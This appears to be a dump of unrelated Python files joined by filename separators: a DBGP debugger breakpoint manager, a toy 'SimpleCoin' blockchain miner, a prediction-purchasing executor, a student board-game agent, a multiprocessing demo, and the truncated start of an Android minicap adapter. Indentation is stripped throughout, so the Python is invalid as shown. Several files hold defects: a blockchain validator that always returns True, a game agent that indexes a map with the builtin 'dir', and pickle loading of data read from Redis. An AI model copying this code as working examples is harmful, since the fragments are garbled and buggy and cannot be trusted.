# The .addBreakpoint*() methods (and .addSpawnpoint()) are convenience
# methods for the more general .addBreakpoint() to add breakpoints of
# specific types.
def addBreakpointConditional(self, lang, cond, file, line, state,
temporary, hitValue, hitCondition):
bp = breakpoint()
bp.initConditional(lang, cond, file, line, state, temporary,
hitValue, hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointLine(self, lang, file, line, state, temporary,
hitValue, hitCondition):
bp = breakpoint()
bp.initLine(lang, file, line, state, temporary, hitValue,
hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointException(self, lang, exceptionName, state, temporary,
hitValue, hitCondition):
bp = breakpoint()
bp.initException(lang, exceptionName, state, temporary, hitValue,
hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointCall(self, lang, func, filename, state, temporary,
hitValue, hitCondition):
bp = breakpoint()
bp.initCall(lang, func, filename, state, temporary, hitValue,
hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointReturn(self, lang, func, filename, state, temporary,
hitValue, hitCondition):
bp = breakpoint()
bp.initReturn(lang, func, filename, state, temporary, hitValue,
hitCondition)
self.addBreakpoint(bp)
return bp
def addBreakpointWatch(self, lang, watch, file, line, state,
temporary, hitValue, hitCondition):
bp = breakpoint()
bp.initWatch(lang, watch, file, line, state, temporary,
hitValue, hitCondition)
self.addBreakpoint(bp)
return bp
def addSpawnpoint(self, lang, filename, line, state):
sp = spawnpoint()
sp.init(lang, filename, line, state)
# we just stuff our spawnpoints into the breakpoints
self.addBreakpoint(sp)
return sp
def addBreakpoint(self, bp):
self._lock.acquire()
try:
bp._guid = self._makeBreakpointGuid()
self._breakpoints[bp.getGuid()] = bp
# Pass this new breakpoint onto any current debug session for
# which this is appropriate.
for session in self._sessions.values():
try:
self._setSessionBreakpointOrQueueIt(session, bp)
except (DBGPError, COMException), ex:
log.exception(ex)
pass # XXX should report to user somehow
self.postAddBreakpoint(bp)
finally:
self._lock.release()
def postAddBreakpoint(self, bp):
"""Method stub to allow subclasses to react to a breakpoint
addition while the breakpoints lock is held.
"""
pass
def removeBreakpoint(self, guid):
self._lock.acquire()
try:
if self._breakpoints.has_key(guid):
bp = self._breakpoints[guid]
del self._breakpoints[guid]
# Remove this breakpoint from any session that currently has it.
for sessId, sessionBPIDs in self._allSessionBPIDs.items():
if guid in sessionBPIDs:
session = self._sessions[sessId]
self._removeSessionBreakpointOrQueueIt(session, bp)
self.postRemoveBreakpoint(bp)
finally:
self._lock.release()
def postRemoveBreakpoint(self, bp):
"""Method stub to allow subclasses to react to a breakpoint
removal while the breakpoints lock is held.
"""
pass
def removeAllBreakpoints(self):
self._lock.acquire()
try:
# Remove all breakpoints from all current debug sessions.
#XXX:PERF _Could_ optimize this if necessary.
for sessId, sessionBPIDs in self._allSessionBPIDs.items():
for guid in sessionBPIDs.keys():
try:
session = self._sessions[sessId]
except KeyError, ex:
log.exception("Failed to find session %r", sessId)
continue
try:
bp = self._breakpoints[guid]
except KeyError, ex:
log.exception("Failed to find breakpoint %r in session %r", guid, sessId)
continue
self._removeSessionBreakpointOrQueueIt(session, bp)
self._breakpoints = {}
self.postRemoveAllBreakpoints()
finally:
self._lock.release()
def postRemoveAllBreakpoints(self):
"""Method stub to allow subclasses to react to a breakpoint list
reset while the breakpoints lock is held.
"""
pass
def updateBreakpoint(self, guid, newBp):
self._lock.acquire()
try:
bp = self._breakpoints[guid]
self.preUpdateBreakpoint(bp)
attrs = bp.update(newBp)
# Update the breakpoint in all current debug sessions that
# have this breakpoint.
# Note: We are presuming here that the breakpoint update did not
# all of the sudden make this breakpoint applicable to a
# debug session when it previously was not.
for sessId, sessionBPIDs in self._allSessionBPIDs.items():
if guid in sessionBPIDs:
session = self._sessions[sessId]
self._updateSessionBreakpointOrQueueIt(session, bp, attrs)
self.postUpdateBreakpoint(bp, attrs)
finally:
self._lock.release()
def preUpdateBreakpoint(self, bp):
"""Method stub to allow subclasses to react _before_ a breakpoint
change while the breakpoints lock is held.
"bp" is the changed breakpoint.
"""
pass
def postUpdateBreakpoint(self, bp, attrs):
"""Method stub to allow subclasses to react to a breakpoint change
while the breakpoints lock is held.
"bp" is the changed breakpoint.
"attrs" is a list of breakpoint attributes that changed.
"""
pass
def getBreakpointsForLanguage(self, lang):
self._lock.acquire()
try:
#XXX Currently don't have to allow the "not bp.language": all
# breakpoints have their language attribute set.
return [bp for bp in self._breakpoints.values()
if not bp.language or bp.language.lower() == lang.lower()]
finally:
self._lock.release()
#---- Managing session breakpoints.
# The first three methods are public and are meant to be called by the
# application (or some other session manager) and the session's.
# The rest are internal methods used to keep breakpoint info in sync
# between here and each session.
def setSessionBreakpoints(self, session):
"""Add the relevant breakpoints to this session.
Returns a newline-separated list of breakpoints (and reasons) that
did not get properly set on the session.
"""
#XXX Breakpoints should only be added once for each
# "application" in DBGP-parlance. In DBGP-land there is one
# "Session" per thread, yet all threads share the same breakpoints.
# At least, that is my understanding of the intention from Shane.
bplog.debug("breakpointManager.setSessionBreakpoints(session)")
breakpoints = [bp for bp in self._breakpoints.values()]
sessId = (session.applicationId, session.threadId)
self._sessions[sessId] = session
self._allSessionBPIDs[sessId] = {}
self._queuedSessionCommands[sessId] = []
failed = [] # list of bp's that did not get set on the session
for bp in breakpoints:
try:
self.__setSessionBreakpoint(session, bp)
except (DBGPError, COMException), ex:
errno, errmsg = getErrorInfo(ex)
failed.append("%s (%s)" % (bp.getName(), errmsg))
return '\n'.join(failed)
def releaseSession(self, session):
"""Release references to this session, it is shutting down."""
sessId = (session.applicationId, session.threadId)
if self._allSessionBPIDs.has_key(sessId):
del self._allSessionBPIDs[sessId]
if self._queuedSessionCommands.has_key(sessId):
del self._queuedSessionCommands[sessId]
if self._sessions.has_key(sessId):
del self._sessions[sessId]
def sendUpdatesToSession(self, session):
"""Any queued breakpoint/spawnpoint updates should be forwarded onto
session.
"""
self._sendQueuedSessionCommands(session)
def _setSessionBreakpointOrQueueIt(self, session, bp):
"""Set the given breakpoint on the given session and update local
cache information on this.
If the session is not in a break state, this command is queued up
until it is.
"""
if session.statusName not in ["break", "starting"]:
# DBGP client sessions can only accept breakpoint changes when
# in the break state. We will queue up this command for later.
# Note that the Python and Ruby back-ends *can* process
# async requests, but we don't have a way of processing
# the responses asynchronously, and tying the UI's guid
# with the back-end's breakpoint ID.
command = ("set", (bp,))
sessId = (session.applicationId, session.threadId)
self._queuedSessionCommands[sessId].append(command)
else:
self._sendQueuedSessionCommands(session)
self.__setSessionBreakpoint(session, bp)
def __setSessionBreakpoint(self, session, bp):
# We are REALLY setting the breakpoint on the session now.
sessId = (session.applicationId, session.threadId)
if bp.type == "spawn":
bpid = session.spawnpointSet(bp)
else:
bpid = session.breakpointSet(bp)
self._allSessionBPIDs[sessId][bp.getGuid()] = bpid
bplog.info("set '%s' %spoint on session %s: bpid='%s'",
bp.getName(), (bp.type=="spawn" and "spawn" or "break"),
sessId, bpid)
def _removeSessionBreakpointOrQueueIt(self, session, bp):
"""Remove the given breakpoint from the given session and update
local cache info.
If the session is not in a break state, this command is queued up
until it is.
"""
if session.statusName != "break":
# DBGP client sessions can only accept breakpoint changes when
# in the break state. We will queue up this command for later.
command = ("remove", (bp,))
sessId = (session.applicationId, session.threadId)
self._queuedSessionCommands[sessId].append(command)
else:
self._sendQueuedSessionCommands(session)
self.__removeSessionBreakpoint(session, bp)
def __removeSessionBreakpoint(self, session, bp):
# We are REALLY removing the breakpoint from the session now.
sessId = (session.applicationId, session.threadId)
sessionBPIDs = self._allSessionBPIDs[sessId]
guid = bp.getGuid()
bpid = sessionBPIDs[guid] # the session's ID for this bp
if bp.type == "spawn":
session.spawnpointRemove(bpid)
else:
session.breakpointRemove(bpid)
del sessionBPIDs[guid]
bplog.info("removed '%s' %spoint from session %s",
bp.getName(), (bp.type=="spawn" and "spawn" or "break"),
sessId)
def _updateSessionBreakpointOrQueueIt(self, session, bp, attrs):
"""Update the given attributes of the given breakpoint on the
given debug session.
If the session is not in a break state, this command is queued up
until it is.
"""
if session.statusName != "break":
# DBGP client sessions can only accept breakpoint changes when
# in the break state. We will queue up this command for later.
command = ("update", (bp, attrs))
sessId = (session.applicationId, session.threadId)
self._queuedSessionCommands[sessId].append(command)
else:
self._sendQueuedSessionCommands(session)
self.__updateSessionBreakpoint(session, bp, attrs)
def __updateSessionBreakpoint(self, session, bp, attrs):
# We are REALLY updating the breakpoint on the session now.
sessId = (session.applicationId, session.threadId)
sessionBPIDs = self._allSessionBPIDs[sessId]
guid = bp.getGuid()
bpid = sessionBPIDs[guid] # the session's ID for this bp
if bp.type == "spawn":
session.spawnpointUpdate(bpid, bp, attrs)
else:
session.breakpointUpdate(bpid, bp, attrs)
bplog.info("updated '%s' %spoint on session %s: attrs=%s",
bp.getName(), (bp.type=="spawn" and "spawn" or "break"),
sessId, attrs)
def _sendQueuedSessionCommands(self, session):
"""Send on any queued up commands for this session."""
sessId = (session.applicationId, session.threadId)
queuedCommands = self._queuedSessionCommands.get(sessId, [])
try:
for commandType, args in queuedCommands:
if commandType == "set":
bp = args[0]
self.__setSessionBreakpoint(session, bp)
elif commandType == "remove":
bp = args[0]
self.__removeSessionBreakpoint(session, bp)
elif commandType == "update":
bp, attrs = args
self.__updateSessionBreakpoint(session, bp, attrs)
finally:
self._queuedSessionCommands[sessId] = []
class manager:
def __init__(self):
self._server_key = None
self._proxyAddr = ''
self._proxyPort = 0
self.proxyClientAddress = ''
self.proxyClientPort = 0
self.appManager = appManager(self)
self.breakpointManager = self.getBreakpointManager()
self._listener = None
def getBreakpointManager(self):
# Allow this to be overridden.
return breakpointManager()
def getURIMappings(self):
# overriden by IDE interface to provide url to local path mapping
# to the debugger engine
return []
def setKey(self, key):
self._server_key = key
# key change, recycle the proxy if necessary
if self._proxyAddr and self._listener:
self._stopProxy()
self._initProxy()
def setProxy(self, address, port):
if self._proxyAddr and self._listener:
self._stopProxy()
self._proxyAddr = address
self._proxyPort = port
if self._proxyAddr and self._listener:
self._initProxy()
def _initProxy(self):
log.debug('manager starting proxy...')
if not self._proxyPort:
self._proxyPort = 9001
if not self._proxyAddr:
self._proxyAddr = '127.0.0.1'
try:
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy_socket.connect((self._proxyAddr,self._proxyPort))
command = u'proxyinit -p %d -k %s -m 1' % \
(self._listener._port,
self._server_key)
proxy_socket.send(command.encode('utf-8'))
resp = proxy_socket.recv(1024)
proxy_socket.close()
dom = minidom.parseString(resp)
root = dom.documentElement
if root.getAttribute('success') == '1':
self.proxyClientAddress = root.getAttribute('address')
self.proxyClientPort = int(root.getAttribute('port'))
except Exception, e:
self.stop()
raise DBGPError("the debugger proxy could not be contacted.")
def _stopProxy(self):
log.debug('manager stopping proxy...')
try:
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy_socket.connect((self._proxyAddr,self._proxyPort))
command = u'proxystop -k %s' % self._server_key
proxy_socket.send(command.encode('utf-8'))
resp = proxy_socket.recv(1024)
proxy_socket.close()
self.proxyClientAddress = ''
self.proxyClientPort = 0
except Exception, e:
# if we cannot stop the proxy when we're stopping, lets let it go
log.debug('unable to contact proxy to stop proxying')
def listen(self, address, port):
log.debug('manager starting listener...')
self._listener = listener(self)
_address, _port = self._listener.start(address,port)
if self._proxyAddr:
self._initProxy()
return (_address, _port)
def stop(self):
if not self._listener:
log.debug('manager stop called, but no listener')
return
if self._proxyAddr:
self._stopProxy()
log.debug('manager stopping listener...')
self._listener.stop()
self._listener = None
def shutdown(self):
self.stop()
self.appManager.shutdown()
def getApplicationList(self):
return self.appManager.appList.values()
##################################################################
# session callback functions
##################################################################
def onConnect(self, session, client, addr):
# before any communication, we can decide if we want
# to allow the connection here. return 0 to deny
log.info("Connection received from %r:%r",addr[0],addr[1])
return 1
def initHandler(self, session, init):
# this is called once during a session, after the connection
# to provide initialization information. initNode is a
# minidom node. If we have a session key, it will be validated
# later, and the key doesn't matter for us.
if self._server_key and not init.getAttribute('session'):
idekey = init.getAttribute('idekey')
if idekey != self._server_key:
session.stop()
log.info("Session stopped, incorrect key [%s]", idekey)
return 0
self.appManager.getApplication(session)
# XXX notify init listeners
return 1
def notifyInit(self, session, init):
# should be overridden
pass
def notifyStartup(self, session, init):
# should be overridden
pass
|
miner.py
|
import time
import hashlib
import json
import requests
import base64
from flask import Flask, request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Returns a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
self.previous_hash = previous_hash
self.hash = self.hash_block()
def hash_block(self):
"""Creates the unique hash for the block. It uses sha256."""
sha = hashlib.sha256()
sha.update((str(self.index) + str(self.timestamp) + str(self.data) + str(self.previous_hash)).encode('utf-8'))
return sha.hexdigest()
def create_genesis_block():
"""To create each block, it needs the hash of the previous one. First
block has no previous, so it must be created manually (with index zero
and arbitrary previous hash)"""
return Block(0, time.time(), {
"proof-of-work": 9,
"transactions": None},
"0")
# Node's blockchain copy
BLOCKCHAIN = [create_genesis_block()]
""" Stores the transactions that this node has in a list.
If the node you sent the transaction adds a block
it will get accepted, but there is a chance it gets
discarded and your transaction goes back as if it was never
processed"""
NODE_PENDING_TRANSACTIONS = []
def proof_of_work(last_proof, blockchain):
# Creates a variable that we will use to find our next proof of work
incrementer = last_proof + 1
# Keep incrementing the incrementer until it's equal to a number divisible by 9
# and the proof of work of the previous block in the chain
start_time = time.time()
while not (incrementer % 7919 == 0 and incrementer % last_proof == 0):
incrementer += 1
# Check if any node found the solution every 60 seconds
if int((time.time()-start_time) % 60) == 0:
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain:
# (False: another node got proof first, new blockchain)
return False, new_blockchain
# Once that number is found, we can return it as a proof of our work
return incrementer, blockchain
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
"""Mining is the only way that new coins can be created.
In order to prevent too many coins to be created, the process
is slowed down by a proof of work algorithm.
"""
# Get the last proof of work
last_block = BLOCKCHAIN[-1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
# If we didn't guess the proof, start mining again
if not proof[0]:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# ...we reward the miner by adding a transaction
# First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(MINER_NODE_URL + "/txion?update=" + MINER_ADDRESS).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
# Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({
"from": "network",
"to": MINER_ADDRESS,
"amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {
"proof-of-work": proof[0],
"transactions": list(NODE_PENDING_TRANSACTIONS)
}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({
"index": new_block_index,
"timestamp": str(new_block_timestamp),
"data": new_block_data,
"hash": last_block_hash
}) + "\n")
a.send(BLOCKCHAIN)
requests.get(MINER_NODE_URL + "/blocks?update=" + MINER_ADDRESS)
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
"""Validate the submitted chain. If hashes are not correct, return false
block(str): json
"""
return True
@node.route('/blocks', methods=['GET'])
def get_blocks():
# Load current blockchain. Only you should update your blockchain
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
# Converts our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": str(block.index),
"timestamp": str(block.timestamp),
"data": str(block.data),
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json)
return chain_to_send
@node.route('/txion', methods=['GET', 'POST'])
def transaction():
"""Each transaction sent to this node gets validated and submitted.
Then it waits to be added to the blockchain. Transactions only move
coins, they don't create it.
"""
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'], new_txion['signature'], new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
# Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
"""Verifies if the signature is correct. This is used to prove
it's you (and not someone else) trying to do a transaction with your
address. Called when a user tries to submit a new transaction.
"""
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
# Try changing into an if/else statement as except is too broad.
try:
return vk.verify(signature, message.encode())
except:
return False
def welcome_msg():
print(""" =========================================\n
SIMPLE COIN v1.0.0 - BLOCKCHAIN SYSTEM\n
=========================================\n\n
You can find more help at: https://github.com/cosme12/SimpleCoin\n
Make sure you are using the latest version or you may end in
a parallel chain.\n\n\n""")
if __name__ == '__main__':
welcome_msg()
# Start mining
a, b = Pipe()
p1 = Process(target=mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
# Start server to receive transactions
p2 = Process(target=node.run(), args=b)
p2.start()
|
executor.py
|
import time
import threading
import traceback
import pickle
import numpy as np
from ..logger import create_null_logger
from .utils import (
fetch_historical_predictions,
fetch_current_predictions,
df_weight_to_purchase_params_list,
blend_predictions,
floor_to_execution_start_at,
calc_target_positions,
create_model_selection_params
)
day_seconds = 24 * 60 * 60
class Executor:
def __init__(self, store=None, tournament_id=None, time_func=None, evaluation_periods=None,
model_selector=None, market_data_store=None, budget_rate=None,
symbol_white_list=None, logger=None, redis_client=None):
self._store = store
self._tournament = store.fetch_tournament(tournament_id)
self._tournament_id = tournament_id
self._time_func = time.time if time_func is None else time_func
self._interval_sec = 15
self._logger = create_null_logger() if logger is None else logger
self._redis_client = redis_client
self._evaluation_periods = evaluation_periods
self._model_selector = model_selector
self._market_data_store = market_data_store
self._symbol_white_list = symbol_white_list.copy()
self._budget_rate = budget_rate
self._thread = None
self._thread_terminated = False
self._initialized = False
# redis
def _get_purchase_info(self, execution_start_at):
key = _purchase_info_key(execution_start_at)
value = self._redis_client.get(key)
if value is None:
return None
return pickle.loads(value)
def _set_purchase_info(self, execution_start_at, info):
key = _purchase_info_key(execution_start_at)
self._redis_client.set(key, pickle.dumps(info))
self._redis_client.expireat(key, execution_start_at + 2 * 24 * 60 * 60)
def start_thread(self):
self._thread = threading.Thread(target=self._run)
self._thread.start()
def terminate_thread(self):
self._thread_terminated = True
self._thread.join()
# called from other thread
def get_target_positions(self, timestamp: int):
execution_start_at, t = floor_to_execution_start_at(timestamp, self._tournament)
execution_time = self._tournament['execution_time']
df_blended_list = []
round_count = day_seconds // execution_time
for i in range(round_count + 1):
df_blended_list.append(self._get_blended_prediction(
execution_start_at=execution_start_at - execution_time * i,
without_fetch_events=i > 0,
))
df_blended_list = list(reversed(df_blended_list))
return calc_target_positions(
t,
df_blended_list,
)
def _get_blended_prediction(self, execution_start_at: int, without_fetch_events=False):
purchase_info = self._get_purchase_info(execution_start_at)
if purchase_info is None:
df_weight = None
else:
df_weight = purchase_info['df_weight']
df_current = fetch_current_predictions(
store=self._store,
tournament_id=self._tournament_id,
execution_start_at=execution_start_at,
without_fetch_events=without_fetch_events,
)
return blend_predictions(
df_current=df_current,
df_weight=df_weight,
)
def _run(self):
while not self._thread_terminated:
try:
if not self._initialized:
self._initialize()
self._initialized = True
self._step()
except Exception as e:
self._logger.error(e)
self._logger.error(traceback.format_exc())
time.sleep(self._interval_sec)
def _step_purchase(self, execution_start_at):
purchase_info = self._get_purchase_info(execution_start_at)
if purchase_info is not None:
return
execution_start_ats = np.sort(
execution_start_at
- day_seconds * np.arange(2, 2 + self._evaluation_periods)
)
df = fetch_historical_predictions(
store=self._store,
tournament_id=self._tournament_id,
execution_start_ats=execution_start_ats,
logger=self._logger,
)
df_current = fetch_current_predictions(
store=self._store,
tournament_id=self._tournament_id,
execution_start_at=execution_start_at,
)
df_market = self._market_data_store.fetch_df_market(
symbols=self._symbol_white_list,
)
params = create_model_selection_params(
df=df,
df_current=df_current,
df_market=df_market,
execution_start_ats=execution_start_ats,
symbols=self._symbol_white_list
)
params.budget = self._budget_rate * self._store.get_balance()
# モデル選択
df_weight = self._model_selector.select_model(params)
df_weight = df_weight.loc[df_weight['weight'] > 0]
self._logger.debug('df_weight {}'.format(df_weight))
# 購入
create_purchase_params_list = df_weight_to_purchase_params_list(
df_current=df_current,
df_weight=df_weight,
execution_start_at=execution_start_at
)
self._store.create_purchases(create_purchase_params_list)
self._set_purchase_info(execution_start_at, {
'df_weight': df_weight
})
def _step(self):
now = int(self._time_func())
t = self._tournament
purchase_time_buffer = int(t['purchase_time'] * 0.2)
purchase_start_at = (t['execution_start_at'] - t['execution_preparation_time'] -
t['shipping_time'] - t['purchase_time'] + purchase_time_buffer)
interval = t['execution_time']
if (now - purchase_start_at) % interval < t['purchase_time'] - purchase_time_buffer:
execution_start_at = ((now - purchase_start_at) // interval) * interval + t['execution_start_at']
self._step_purchase(execution_start_at)
def _initialize(self):
self._market_data_store.fetch_df_market(
symbols=self._symbol_white_list,
)
def _purchase_info_key(execution_start_at):
return 'purchase_info:{}'.format(execution_start_at)
|
student_agent.py
|
# Student agent: Add your own agent here
from collections import defaultdict, namedtuple
from importlib.resources import path
from random import random, choice, randint
from shutil import move
from agents.agent import Agent
from store import register_agent
from threading import Thread
@register_agent("student_agent")
class StudentAgent(Agent):
"""
A dummy class for your implementation. Feel free to use this class to
add any helper functionalities needed for your agent.
"""
def __init__(self):
super(StudentAgent, self).__init__()
self.name = "Thanos"
self.autoplay = True
self.dir_map = {
"u": 0,
"r": 1,
"d": 2,
"l": 3,
}
def step(self, chess_board, my_pos, adv_pos, max_step):
dim = (max_step * 2) - 1
i, j = my_pos
pos_bars = chess_board[i, j]
"""
Implement the step function of your agent here.
You can use the following variables to access the chess board:
- chess_board: a numpy array of shape (x_max, y_max, 4)
- my_pos: a tuple of (x, y)
- adv_pos: a tuple of (x, y)
- max_step: an integer
You should return a tuple of ((x, y), dir),
where (x, y) is the next position of your agent and dir is the direction of the wall
you want to put on.
Please check the sample implementation in agents/random_agent.py or agents/human_agent.py for more details.
"""
# dummy return
analyzer = Thread(target=self.analyze, name="Analyzer", args=(my_pos, chess_board, adv_pos, max_step), daemon=True)
analyzer.start()
analyzer.join()
# self.analyze(my_pos, chess_board, adv_pos, max_step)
return my_pos, self.dir_map[dir]
def analyze(self, my_pos: tuple, chess_board, adv_pos: tuple, max_steps: int):
dimension = (max_steps * 2) - 1
print("=" * 30)
print("Starting Thread...")
path = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
print(path)
print("-" * 30)
print("Thread just ended")
print("=" * 30)
def paths(self, max_steps, chess_board, my_pos, adv_pos, dimension):
x, y = my_pos
depth = 0
node = Vertex(l=None, r=None, u=None, d=None, adv=False, x_val=x, y_val=y)
if depth == max_steps:
return node
if my_pos == adv_pos:
return node
else:
while max_steps > 0:
for d in range(4):
if d == 0:
if self.is_barrier(chess_board, my_pos, d, dimension) == False:
my_pos = self.move(my_pos, d)
max_steps = max_steps - 1
node.up = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
if d == 1:
if self.is_barrier(chess_board, my_pos, d, dimension) == False:
max_steps = max_steps - 1
my_pos = self.move(my_pos, d)
node.right = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
if d == 2:
if self.is_barrier(chess_board, my_pos, d, dimension) == False:
max_steps = max_steps - 1
my_pos = self.move(my_pos, d)
node.down = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
if d == 3:
if self.is_barrier(chess_board, my_pos, d, dimension) == False:
max_steps = max_steps - 1
my_pos = self.move(my_pos, d)
node.left = self.paths(max_steps, chess_board, my_pos, adv_pos, dimension)
max_steps = max_steps - 1
depth = depth + 1
return node
def move(self, position: tuple, direction: int):
moves = ((-1, 0), (0, 1), (1, 0), (0, -1))
x, y = position
movex, movey = moves[direction]
pos = (x + movex, y + movey)
return pos
def putbarrier(self, position: tuple, direction: int):
if self.is_barrier(position, direction):
for i in range(4):
self.putbarrier(position, i)
else:
dir = self.dir_map.get(direction)
return dir
def is_boundary(self, position: tuple, dimension: int):
x, y = position
return 0 == x == dimension or 0 == y == dimension
def is_barrier(self, board, position: tuple, direction: int, dimension: int):
x, y = position
value = board[x, y]
if self.is_boundary(position, dimension):
return True
return value[direction]
def barrier_count(self, position: tuple, dimension: int, board):
barrier = 0
for i in self.dir_map.values():
if self.is_barrier(board, position, i, dimension):
barrier = barrier + 1
return barrier
class Vertex(object):
def __init__(self, l, r, u, d, adv, x_val, y_val):
self.name = "cell (" + str(x_val) + "," + str(y_val) + ")"
self.has_enemy = adv
self.right = r
self.left = l
self.up = u
self.down = d
self.x_val = x_val
self.y_val = y_val
def __repr__(self):
return str({
'name': self.name,
'has_enemy': self.has_enemy,
'right': self.right,
'left': self.left,
'up': self.up,
'down': self.down,
'x': self.x_val,
'y' : self.y_val
})
class Graph(object):
# G = (V, E)
# V = Vertext
# E = Edge: (V1 - V2)
graph = defaultdict(list)
def __init__(self, graphdic = None):
if graphdic is None:
graphdic = {}
self.graphdic = graphdic
def getVertices(self):
return list(self.graphdic.keys())
def getEdges(self):
return list(self.graphdic.values())
def setVertex(self, vertex):
if vertex.name not in self.graphdic:
self.graphdic[vertex] = []
def setEdge(self, edge):
edge = set(edge)
(vertex_1, vertex_2) = tuple(edge)
if vertex_1 in self.graphdic:
self.graphdic[vertex_1].append(vertex_2)
else:
self.graphdic[vertex_1] = [vertex_2]
def find_distinct_edges(self):
edgename = []
for vertex in self.graphdic:
for next_vertex in self.graphdic[vertex]:
if {next_vertex, vertex} not in edgename:
edgename.append({vertex, next_vertex})
return edgename
|
spawn_a_process.py
|
#Spawn a Process – Section 3: Process Based Parallelism
import multiprocessing
"""
Paralelismo de um objeto processo em três etapas:
1. criar o objeto processo
2. obj_process.start() -> inicia o processo
3 obj_process.join() -> espera até que o processo termine para ir para a próxima instrução da thread que chamou o processo
"""
def function(i):
print ('called function in process: %s' %i)
return
if __name__ == '__main__':
Process_jobs = []
for i in range(5):
p = multiprocessing.Process(target=function, args=(i,))
Process_jobs.append(p)
p.start()
p.join()
|
minicap.py
|
import logging
import socket
import subprocess
import time
import os
from datetime import datetime
from .adapter import Adapter
MINICAP_REMOTE_ADDR = "localabstract:minicap"
ROTATION_CHECK_INTERVAL_S = 1 # Check rotation once per second
class MinicapException(Exception):
"""
Exception in minicap connection
"""
pass
class Minicap(Adapter):
"""
a connection with target device through minicap.
"""
def __init__(self, device=None):
"""
initiate a minicap connection
:param device: instance of Device
:return:
"""
self.logger = logging.getLogger(self.__class__.__name__)
self.host = "localhost"
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.port = self.device.get_random_port()
self.remote_minicap_path = "/data/local/tmp/minicap-devel"
self.sock = None
self.connected = False
self.minicap_process = None
self.banner = None
self.width = -1
self.height = -1
self.orientation = -1
self.last_screen = None
self.last_screen_time = None
self.last_views = []
self.last_rotation_check_time = datetime.now()
def set_up(self):
device = self.device
try:
minicap_files = device.adb.shell("ls %s 2>/dev/null" % self.remote_minicap_path).split()
if "minicap.so" in minicap_files and ("minicap" in minicap_files or "minicap-nopie" in minicap_files):
self.logger.debug("minicap was already installed.")
return
except:
pass
if device is not None:
# install minicap
import pkg_resources
local_minicap_path = pkg_resources.resource_filename("droidbot", "resources/minicap")
try:
device.adb.shell("mkdir %s" % self.remote_minicap_path)
except Exception:
pass
abi = device.adb.get_property('ro.product.cpu.abi')
sdk = device.get_sdk_version()
if sdk >= 16:
minicap_bin = "minicap"
else:
